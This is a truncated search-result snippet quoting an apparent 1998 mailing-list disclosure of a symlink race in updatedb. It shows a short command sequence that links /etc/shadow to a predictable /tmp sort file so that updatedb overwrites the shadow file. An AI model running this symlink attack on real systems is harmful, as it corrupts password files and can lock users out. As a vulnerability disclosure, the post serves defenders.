Displaying 1 result from an estimated 1 matches for "sort012340003".
Did you mean:
sort012340000
1998 Mar 01
0
overwrite any file with updatedb
...pdatedb will kindly overwrite it
for you. Ex:
<assuming updatedb is running in the background>
$ ls /tmp
sort012340000 sort012340001
$ ln -s /etc/shadow /tmp/sort012340002
<wait for awhile to give updatedb time to write to our link>
$ ls /tmp
sort012340000 sort012340001 sort012340002 sort012340003
It''s done, it will now clear out it''s files from /tmp. Now go look at the
shadow password file. It will be quite larger then it was before. About
512k is it''s new size. I played with this for awhile but couldn''t find
anyway to write anything useful to any file e...